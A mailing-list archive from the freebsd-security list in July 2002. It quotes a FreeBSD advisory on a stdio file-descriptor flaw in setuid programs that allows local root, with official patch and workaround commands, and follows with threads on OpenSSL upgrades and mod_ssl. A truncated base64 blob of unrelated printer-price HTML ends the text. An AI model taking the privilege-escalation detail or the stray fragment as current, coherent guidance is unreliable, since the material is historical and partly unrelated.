> > Nate > > ----- Original Message ----- > >>It uses libcrypto, but it shouldn't be vulnerable. I meant that openssh isn't vulnerable (since, afair, it doesn't use the ASN.1 parser). Regards, -- Michael Nottebrock "The circumstance ends uglily in the cruel result." - Babelfish --------------enig94B1047890529B542E71C0E8 Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD4DBQE9RxzUXhc68WspdLARAuO4AJjGUIGKZWeMkuTX9Lg9cMeQbC3oAJ0dVlN3 QKPwTBUbAqoOU71LY8NEVQ== =Am1T -----END PGP SIGNATURE----- --------------enig94B1047890529B542E71C0E8-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 18:40:54 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 20C3437B400 for ; Tue, 30 Jul 2002 18:40:46 -0700 (PDT) Received: from localhost.neotext.ca (h24-70-64-200.ed.shawcable.net [24.70.64.200]) by mx1.FreeBSD.org (Postfix) with ESMTP id C418A43E65 for ; Tue, 30 Jul 2002 18:40:44 -0700 (PDT) (envelope-from campbell@babayaga.neotext.ca) Received: from babayaga.neotext.ca (localhost.neotext.ca [127.0.0.1]) by localhost.neotext.ca (8.11.6/8.11.0) with ESMTP id g6V1f5u40958 for ; Tue, 30 Jul 2002 19:41:06 -0600 (MDT) (envelope-from campbell@babayaga.neotext.ca) From: "Duncan Patton a Campbell is Dhu" To: security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:23.stdio [REVISED] Date: Tue, 30 Jul 2002 19:41:05 -0600 Message-Id: <20020731014105.M64421@babayaga.neotext.ca> In-Reply-To: <200207301821.g6UIL5nc034058@freefall.freebsd.org> References: <200207301821.g6UIL5nc034058@freefall.freebsd.org> X-Mailer: Open WebMail 1.70 20020712 X-OriginatingIP: 127.0.0.1 (campbell) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Sender: 
owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Peculiar but true:

The first time I fetched these patches (I got both) the stdio and stdio2 patches both had 804 octets in 'em:

-rw-r--r--  1 root  wheel   804 Jul 29 21:26 stdio.patch.v1.2
-rw-r--r--  1 root  wheel   305 Jul 29 21:26 stdio.patch.v1.2.asc
-rw-r--r--  1 root  wheel   804 Jul 29 21:26 stdio2.patch.v1.2
-rw-r--r--  1 root  wheel   305 Jul 29 21:26 stdio2.patch.v1.2.asc

On the second go they differed:

-rw-------  1 root  wheel  3715 Jul 30 19:15 stdio.patch.v1.2
-rw-------  1 root  wheel   305 Jul 30 19:15 stdio.patch.v1.2.asc
-rw-r--r--  1 root  wheel   804 Jul 29 21:26 stdio2.patch.v1.2
-rw-r--r--  1 root  wheel   305 Jul 29 21:26 stdio2.patch.v1.2.asc

Warning, warning, Will Robinson!

Would anyone care to hazard a guess as to whether I've been rooted?

Duncan Patton a Campbell is Duibh ;-)

---------- Original Message -----------
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Sent: Tue, 30 Jul 2002 11:21:05 -0700 (PDT)
Subject: FreeBSD Security Advisory FreeBSD-SA-02:23.stdio [REVISED]

> -----BEGIN PGP SIGNED MESSAGE-----
>
> =============================================================================
> FreeBSD-SA-02:23.stdio                                      Security Advisory
>                                                           The FreeBSD Project
>
> Topic:          insecure handling of stdio file descriptors
>
> Category:       core
> Module:         kernel
> Announced:      2002-04-22
> Credits:        Joost Pol,
>                 Georgi Guninski
> Affects:        All releases of FreeBSD up to and including 4.6-RELEASE
>                 4.6-STABLE prior to the correction date
> Corrected:      2002-07-30 15:40:46 UTC (RELENG_4)
>                 2002-07-30 15:42:11 UTC (RELENG_4_6)
>                 2002-07-30 15:42:46 UTC (RELENG_4_5)
>                 2002-07-30 15:43:17 UTC (RELENG_4_4)
> FreeBSD only:   NO
>
> 0.   Revision History
>
> v1.0  2002-04-22  Initial release
> v1.1  2002-04-23  Patch and revision numbers updated
> v1.2  2002-07-29  procfs issue; updated patch
>
> I.   Background
>
> By convention, POSIX systems associate file descriptors 0, 1, and 2 with
> standard input, standard output, and standard error, respectively.  Almost
> all applications give these stdio file descriptors special significance,
> such as writing error messages to standard error (file descriptor 2).
>
> In new processes, all file descriptors are duplicated from the parent
> process.  Unless these descriptors are marked close-on-exec, they retain
> their state during an exec.
>
> All POSIX systems assign file descriptors in sequential order, starting
> with the lowest unused file descriptor.  For example, if a newly exec'd
> process has file descriptors 0 and 1 open, but file descriptor 2 closed,
> and then opens a file, the new file descriptor is guaranteed to be 2
> (standard error).
>
> II.  Problem Description
>
> Some programs are set-user-id or set-group-id, and therefore run with
> increased privileges.  If such a program is started with some of the stdio
> file descriptors closed, the program may open a file and inadvertently
> associate it with standard input, standard output, or standard error.  The
> program may then read data from or write data to the file inappropriately.
> If the file is one that the user would normally not have privileges to
> open, this may result in an opportunity for privilege escalation.
>
> The original correction for this problem (corresponding to the first
> revision of this advisory) contained an error.  Systems using procfs or
> linprocfs could still be exploited.  The dates for the original,
> incomplete correction were:
>
> Corrected:      2002-04-21 13:06:45 UTC (RELENG_4)
>                 2002-04-21 13:08:57 UTC (RELENG_4_5)
>                 2002-04-21 13:10:51 UTC (RELENG_4_4)
>
> III. Impact
>
> Local users may gain superuser privileges.  It is known that the `keyinit'
> set-user-id program is exploitable using this method.  There may be other
> programs that are exploitable.
>
> IV.  Workaround
>
> [FreeBSD systems earlier than 4.5-RELEASE-p4 and 4.4-RELEASE-p11]
>
> None.  The set-user-id bit may be removed from `keyinit' using the
> following command, but note that there may be other programs that can be
> exploited.
>
> # chmod 0555 /usr/bin/keyinit
>
> [FreeBSD versions 4.5-RELEASE-p4 or later, 4.4-RELEASE-p11 or later,
> 4.6-RELEASE, and 4.6-STABLE]
>
> Unmount all instances of the procfs and linprocfs filesystems using the
> umount(8) command:
>
> # umount -f -a -t procfs
> # umount -f -a -t linprocfs
>
> V.   Solution
>
> The kernel was modified to check file descriptors 0, 1, and 2 when
> starting a set-user-ID or set-group-ID executable.  If any of these are
> not in use, they will be redirected to /dev/null.
>
> 1) Upgrade your vulnerable system to 4.6-STABLE; or to any of the
> RELENG_4_6 (4.6.1-RELEASE-p1), RELENG_4_5 (4.5-RELEASE-p10), or RELENG_4_4
> (4.4-RELEASE-p17) security branches dated after the respective correction
> dates.
>
> 2) To patch your present system:
>
> a) Download the relevant patch from the location below, and verify the
> detached PGP signature using your PGP utility.
>
> [FreeBSD systems earlier than 4.5-RELEASE-p4 and 4.4-RELEASE-p11]
>
> # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:23/stdio.patch.v1.2
> # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:23/stdio.patch.v1.2.asc
>
> [FreeBSD versions 4.5-RELEASE-p4 or later, 4.4-RELEASE-p11 or later,
> 4.6-RELEASE, and 4.6-STABLE]
>
> # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:23/stdio2.patch.v1.2
> # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:23/stdio2.patch.v1.2.asc
>
> b) Execute the following commands as root:
>
> # cd /usr/src
> # patch < /path/to/patch
>
> c) Recompile your kernel as described in
> http://www.freebsd.org/handbook/kernelconfig.html and reboot the system.
>
> VI.  Correction details
>
> The following list contains the revision numbers of each file that was
> corrected in FreeBSD.
>
> Path                      Branch      Revision
> ------------------------- ----------- ---------------
> sys/sys/filedesc.h        RELENG_4    1.19.2.4
>                           RELENG_4_6  1.19.2.4
>                           RELENG_4_5  1.19.2.3.6.1
>                           RELENG_4_4  1.19.2.3.4.1
> sys/kern/kern_exec.c      RELENG_4    1.107.2.15
>                           RELENG_4_6  1.107.2.14.2.1
>                           RELENG_4_5  1.107.2.13.2.2
>                           RELENG_4_4  1.107.2.8.2.3
> sys/kern/kern_descrip.c   RELENG_4    1.81.2.12
>                           RELENG_4_6  1.81.2.14
>                           RELENG_4_5  1.81.2.9.2.2
>                           RELENG_4_4  1.81.2.8.2.2
> sys/conf/newvers.sh       RELENG_4_6  1.44.2.23.2.6
>                           RELENG_4_5  1.44.2.20.2.11
>                           RELENG_4_4  1.44.2.17.2.16
> -----------------------------------------------------------------------------
>
> VII. References
>
> PINE-CERT-20020401
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.0.7 (FreeBSD)
>
> iQCVAwUBPUbXw1UuHi5z0oilAQFgKQP/eOnmHorw/4NVEAEKTQp4+X7Px9p1wUGq
> 6OcLH5GuTbbwexd7KbCjbjzNZF7zgz1Qph2v7NQXb+W/ZaW2hEgcoURXkBomVxjl
> 61oXu72P35bmgNo7GQ794v/WDHd8FymtBv0kyY/vuZqg6l99tTuwi2ryV1ZszVrh
> w21lAbhkyQo=
> =YGVw
> -----END PGP SIGNATURE-----
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security-notifications" in
> the body of the message
------- End of Original Message -------

From owner-freebsd-security Tue Jul 30 19:13:15 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 52C0737B400 for ; Tue, 30 Jul 2002 19:13:13 -0700 (PDT)
Received: from bunning.skiltech.com (bunning.skiltech.com [216.235.79.240]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9A47B43E31 for ; Tue, 30 Jul 2002 19:13:12 -0700 (PDT) (envelope-from minter@lunenburg.org)
Received: (from root@localhost) by bunning.skiltech.com (8.12.3/8.12.3) id g6V2DB82047711
for security@freebsd.org; Tue, 30 Jul 2002 22:13:11 -0400 (EDT) (envelope-from minter@lunenburg.org) Received: from dundas.lunenburg.org (rdu162-234-201.nc.rr.com [24.162.234.201]) (authenticated bits=0) by bunning.skiltech.com (8.12.3/8.12.3) with ESMTP id g6V2D504047701 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO) for ; Tue, 30 Jul 2002 22:13:09 -0400 (EDT) (envelope-from minter@lunenburg.org) Date: Tue, 30 Jul 2002 22:13:05 -0400 Mime-Version: 1.0 (Apple Message framework v482) Content-Type: text/plain; charset=US-ASCII; format=flowed Subject: OpenSSL workaround From: "H. Wade Minter" To: security@freebsd.org Content-Transfer-Encoding: 7bit Message-Id: <0C59F80C-A42B-11D6-9472-003065819B10@lunenburg.org> X-Mailer: Apple Mail (2.482) X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I saw that openssl got committed to RELENG_4_6 today, but haven't seen a security announcement go by. What's the recommended way to patch this openssl hole? 
--Wade To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 20:19:21 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id DBD2637B400 for ; Tue, 30 Jul 2002 20:19:19 -0700 (PDT) Received: from cage.simianscience.com (cage.simianscience.com [64.7.134.1]) by mx1.FreeBSD.org (Postfix) with ESMTP id 04D8743E6A for ; Tue, 30 Jul 2002 20:19:19 -0700 (PDT) (envelope-from mike@sentex.net) Received: from house.sentex.net (fcage [192.168.0.2]) by cage.simianscience.com (8.12.5/8.12.3) with ESMTP id g6V3JG1A035886 for ; Tue, 30 Jul 2002 23:19:17 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <5.1.0.14.0.20020730231635.040ee248@192.168.0.12> X-Sender: mdtancsa@192.168.0.12 X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Tue, 30 Jul 2002 23:21:20 -0400 To: security@freebsd.org From: Mike Tancsa Subject: apache mod_ssl ? Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: amavis-20020220 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org After a buildworld, do I need to worry about apache with mod_ssl ? Are there parts that are statically compiled using openSSL ? 
---Mike -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Sentex Communications, mike@sentex.net Providing Internet since 1994 www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 20:20:18 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 10C9337B400 for ; Tue, 30 Jul 2002 20:20:13 -0700 (PDT) Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7931943E31 for ; Tue, 30 Jul 2002 20:20:12 -0700 (PDT) (envelope-from nectar@nectar.cc) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id F148210; Tue, 30 Jul 2002 22:20:11 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g6V3KBU4049322; Tue, 30 Jul 2002 22:20:11 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g6V3KAjM049276; Tue, 30 Jul 2002 22:20:10 -0500 (CDT) Date: Tue, 30 Jul 2002 22:20:10 -0500 From: "Jacques A. 
Vidrine" To: Duncan Patton a Campbell is Dhu Cc: security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:23.stdio [REVISED] Message-ID: <20020731032010.GA38906@madman.nectar.cc> References: <200207301821.g6UIL5nc034058@freefall.freebsd.org> <20020731014105.M64421@babayaga.neotext.ca> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020731014105.M64421@babayaga.neotext.ca> X-Url: http://www.nectar.cc/ User-Agent: Mutt/1.5.1i-ja.1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Jul 30, 2002 at 07:41:05PM -0600, Duncan Patton a Campbell is Dhu wrote: > Peculiar but true: > > The first time I fetched these patches (I got both) the > stdio and stdio2 patches both had 804 octets in 'em: > [snip] > > On the second go they differed: You're just lucky. :-) In fact, when I originally uploaded the patches, I mixed up stdio.patch and stdio2.patch. Someone later pointed out the error to me, so I swapped them. You probably caught a glimpse of the directory listing right before and right after that FTP mirror pulled down the updates. Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . 
nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 20:21:35 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 233A437B400 for ; Tue, 30 Jul 2002 20:21:33 -0700 (PDT) Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7486043E6A for ; Tue, 30 Jul 2002 20:21:32 -0700 (PDT) (envelope-from nectar@nectar.cc) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id 15A2310; Tue, 30 Jul 2002 22:21:32 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g6V3LVU4053682; Tue, 30 Jul 2002 22:21:31 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g6V3LVh9053640; Tue, 30 Jul 2002 22:21:31 -0500 (CDT) Date: Tue, 30 Jul 2002 22:21:31 -0500 From: "Jacques A. Vidrine" To: "H. Wade Minter" Cc: security@freebsd.org Subject: Re: OpenSSL workaround Message-ID: <20020731032131.GB38906@madman.nectar.cc> References: <0C59F80C-A42B-11D6-9472-003065819B10@lunenburg.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <0C59F80C-A42B-11D6-9472-003065819B10@lunenburg.org> X-Url: http://www.nectar.cc/ User-Agent: Mutt/1.5.1i-ja.1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Jul 30, 2002 at 10:13:05PM -0400, H. Wade Minter wrote: > I saw that openssl got committed to RELENG_4_6 today, but haven't seen a > security announcement go by. What's the recommended way to patch this > openssl hole? You can cvsup to RELENG_4_6. 
I probably won't send out the announcement until I've finished with RELENG_4_5 and RELENG_4_4, and that won't be tonight. For various reasons, merging and testing the upgrade is time consuming. Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 20:35:48 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8DBCD37B400 for ; Tue, 30 Jul 2002 20:35:46 -0700 (PDT) Received: from net2.dinoex.sub.org (net2.dinoex.de [212.184.201.182]) by mx1.FreeBSD.org (Postfix) with ESMTP id 535C843E65 for ; Tue, 30 Jul 2002 20:35:44 -0700 (PDT) (envelope-from dirk.meyer@dinoex.sub.org) Received: from net2.dinoex.sub.org (dinoex@net2.dinoex.sub.org [127.0.0.1]) by net2.dinoex.sub.org (8.12.5/8.12.5) with ESMTP id g6V3ZB5H004833 for ; Wed, 31 Jul 2002 05:35:13 +0200 (CEST) (envelope-from dirk.meyer@dinoex.sub.org) X-MDaemon-Deliver-To: Received: from gate.dinoex.sub.org (dinoex@localhost) by net2.dinoex.sub.org (8.12.5/8.12.5/Submit) with BSMTP id g6V3Z9kv004809 for ; Wed, 31 Jul 2002 05:35:09 +0200 (CEST) (envelope-from dirk.meyer@dinoex.sub.org) To: freebsd-security@FreeBSD.ORG Message-ID: From: dirk.meyer@dinoex.sub.org (Dirk Meyer) Organization: privat Subject: Re: Fixing OpenSSL Properly Date: Wed, 31 Jul 2002 05:27:32 +0200 X-Mailer: Dinoex 1.79 References: <20020730195807.28306.qmail@web11607.mail.yahoo.com> X-Gateway: ZCONNECT gate.dinoex.sub.org [UNIX/Connect 0.94] X-PGP-Fingerprint: 44 16 EC 0A D3 3A 4F 28 8A 8A 47 93 F1 CF 2F 12 X-Copyright: (C) Copyright 2001 by Dirk Meyer -- All rights reserved. 
X-PGP-Key-Avail: mailto:pgp-public-keys@keys.de.pgp.net Subject:GET 0x331CDA5D X-ZC-VIA: 20020731000000S+2@dinoex.sub.org X-Accept-Language: de,en X-Noad: Please don't send me ad's by mail. I'm bored by this type of mail. X-Note: sending SPAM is a violation of both german and US law and will at least trigger a complaint at your provider's postmaster. X-No-Archive: yes Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Holt Grendal wrote: > I figure: > cd /usr/ports/security/openssl > make OPENSSL_OVERWRITE_BASE=YES install > > Then Rebuild libssh, mod_ssl, and anything else along > with restarting sshd, apache and anything else? > > Will this all work fine and dandy? for the ports this will work fine. Only some apps in the base system may fail. kind regards Dirk - Dirk Meyer, Im Grund 4, 34317 Habichtswald, Germany - [dirk.meyer@dinoex.sub.org],[dirk.meyer@guug.de],[dinoex@FreeBSD.org] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 20:35:56 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7472237B405 for ; Tue, 30 Jul 2002 20:35:48 -0700 (PDT) Received: from net2.dinoex.sub.org (net2.dinoex.de [212.184.201.182]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2EE7743E65 for ; Tue, 30 Jul 2002 20:35:47 -0700 (PDT) (envelope-from dirk.meyer@dinoex.sub.org) Received: from net2.dinoex.sub.org (dinoex@net2.dinoex.sub.org [127.0.0.1]) by net2.dinoex.sub.org (8.12.5/8.12.5) with ESMTP id g6V3ZE5H004854 for ; Wed, 31 Jul 2002 05:35:16 +0200 (CEST) (envelope-from dirk.meyer@dinoex.sub.org) X-MDaemon-Deliver-To: Received: from gate.dinoex.sub.org (dinoex@localhost) by net2.dinoex.sub.org (8.12.5/8.12.5/Submit) with BSMTP id g6V3ZDoh004832 
for ; Wed, 31 Jul 2002 05:35:13 +0200 (CEST) (envelope-from dirk.meyer@dinoex.sub.org) To: freebsd-security@FreeBSD.ORG Message-ID: From: dirk.meyer@dinoex.sub.org (Dirk Meyer) Organization: privat Subject: Re: make buildworld after openssl/openssh-overwrite-base Date: Wed, 31 Jul 2002 05:27:32 +0200 X-Mailer: Dinoex 1.79 References: <200207302118.g6ULI6q5015864@router.darlow.co.uk> X-Gateway: ZCONNECT gate.dinoex.sub.org [UNIX/Connect 0.94] X-PGP-Fingerprint: 44 16 EC 0A D3 3A 4F 28 8A 8A 47 93 F1 CF 2F 12 X-Copyright: (C) Copyright 2001 by Dirk Meyer -- All rights reserved. X-PGP-Key-Avail: mailto:pgp-public-keys@keys.de.pgp.net Subject:GET 0x331CDA5D X-ZC-VIA: 20020731000000S+2@dinoex.sub.org X-Accept-Language: de,en X-Noad: Please don't send me ad's by mail. I'm bored by this type of mail. X-Note: sending SPAM is a violation of both german and US law and will at least trigger a complaint at your provider's postmaster. X-No-Archive: yes Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Neil Darlow wrote: > Following the advice of adding NO_OPENSSL and NO_OPENSSH to my > /etc/make.conf [...] > How can I get a make buildworld to link such applications against the newly > installed openssl-overwrite-base-0.9.6e port? You might have to change in the dirs by hand and rebuild/install it as a separate step after installworld.
kind regards Dirk - Dirk Meyer, Im Grund 4, 34317 Habichtswald, Germany - [dirk.meyer@dinoex.sub.org],[dirk.meyer@guug.de],[dinoex@FreeBSD.org] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 1:25:43 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 79F6737B400 for ; Wed, 31 Jul 2002 01:25:39 -0700 (PDT) Received: from smtp.firebox.ca (userfc050.dsl.pipex.com [62.190.122.50]) by mx1.FreeBSD.org (Postfix) with ESMTP id A02D243E42 for ; Wed, 31 Jul 2002 01:25:38 -0700 (PDT) (envelope-from scott@roeder.org.uk) Received: from roeder.org.uk (sumo.isode.com [193.133.227.115]) by smtp.firebox.ca (Postfix) with ESMTP id 585204B48E for ; Wed, 31 Jul 2002 09:25:46 +0100 (BST) Message-ID: <3D479EDD.2060503@roeder.org.uk> Date: Wed, 31 Jul 2002 09:25:01 +0100 From: Scott Roeder User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1b) Gecko/20020722 X-Accept-Language: en-us, en MIME-Version: 1.0 To: FreeBSD-security@FreeBSD.org Subject: Subscribe X-Enigmail-Version: 0.65.1.0 X-Enigmail-Supports: pgp-inline, pgp-mime Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="------------ms060105000607000906080602" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a cryptographically signed message in MIME format. 
Subscribe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 1:57: 4 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 54D7937B400 for ; Wed, 31 Jul 2002 01:57:01 -0700 (PDT) Received: from vmunix.dk (vmunix.dk [80.197.228.10]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6613A43E42 for ; Wed, 31 Jul 2002 01:57:00 -0700 (PDT) (envelope-from sst@fnyx.vmunix.dk) Received: from fnyx.vmunix.dk (localhost [IPv6:::1]) by vmunix.dk (8.12.5/8.12.5) with ESMTP id g6V8uv84034069; Wed, 31 Jul 2002 10:56:58 +0200 (CEST) (envelope-from sst@fnyx.vmunix.dk) Received: (from sst@localhost) by fnyx.vmunix.dk (8.12.5/8.12.5/Submit) id g6V8uv3D034068; Wed, 31 Jul 2002 10:56:57 +0200 (CEST) Date: Wed, 31 Jul 2002 10:56:57 +0200 From: Sune Stjerneby To: Mike Tancsa Cc: security@freebsd.org Subject: Re: apache mod_ssl ? Message-ID: <20020731085657.GA33775@fnyx.vmunix.dk> References: <5.1.0.14.0.20020730231635.040ee248@192.168.0.12> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <5.1.0.14.0.20020730231635.040ee248@192.168.0.12> Organization: Little if any. User-Agent: Mutt/1.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Mike Tancsa writes: >After a buildworld, do I need to worry about apache with mod_ssl ? Are >there parts that are statically compiled using openSSL ?
I suspect so,

% strings /usr/local/libexec/apache/libssl.so | egrep "0\.9\.6"
OpenSSL 0.9.6a 5 Apr 2001

After a rebuild, it reads "OpenSSL 0.9.6e 30 Jul 2002" in apache/libssl.so.

-- Sune Stjerneby % bloto flem rech rech kini To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
dGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+ TGFzZXJXcml0ZXIgU2VsZWN0IDM2MDwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8 dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPk0xOTYwR0E8 L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xv cj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4kNzQ8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90 ZD4NCjwvdHI+DQoNCjx0cj4NCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxm b250IHNpemU9KzE+SXRlbSAjNDwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+ DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkxhc2VyV3JpdGVy IDE2LyA2MDAgUHJvJm5ic3A7PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4N CjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+TTI0NzNHQTwvZm9u dD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIj MDAwMDk5Ij48Zm9udCBzaXplPSsxPiQ1OTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0K PC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQg c2l6ZT0rMT5JdGVtICM1PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxj ZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+TGFzZXJXcml0ZXIgMTIv IDY0MCBQUzwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxm b250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPk00NjgzR0EmbmJzcDs8L2ZvbnQ+PC9m 